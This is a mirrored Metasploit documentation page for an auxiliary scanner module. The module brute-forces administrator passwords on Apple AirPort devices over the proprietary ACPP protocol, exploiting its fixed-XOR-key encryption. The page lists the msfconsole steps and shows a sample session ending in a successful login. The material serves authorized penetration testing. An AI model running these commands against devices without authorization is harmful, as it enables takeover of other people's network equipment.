CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/auxiliary/scanner/acpp/login.md
Views: 1904

Vulnerable Application

ACPP is an undocumented and proprietary Apple protocol found in Airport products which protects the credentials used to administer the device. This module attempts exploit a weak encryption mechanism (fixed XOR key) by brute forcing the password via a dictionary attack or specific password.

More information can be found on the Rapid7 Vulnerability & Exploit Database page

Verification Steps

  1. Start msfconsole

  2. Do: use auxiliary/scanner/acpp/login

  3. Do: set RHOSTS [ip]

  4. Do: run

Scenarios

Apple AirPort Extreme 802.11g

msf > use auxiliary/scanner/acpp/login msf auxiliary(scanner/acpp/login) > show options msf auxiliary(scanner/acpp/login) > set RHOSTS 1.1.1.1 RHOSTS => 1.1.1.1 msf auxiliary(scanner/acpp/login) > set PASSWORD myPassword PASSWORD => myPassword msf auxiliary(scanner/acpp/login) > run [*] 1.1.1.1:5009 - 1.1.1.1:5009 - Starting ACPP login sweep [*] 1.1.1.1:5009 - 1.1.1.1:5009 - ACPP Login Successful: myPassword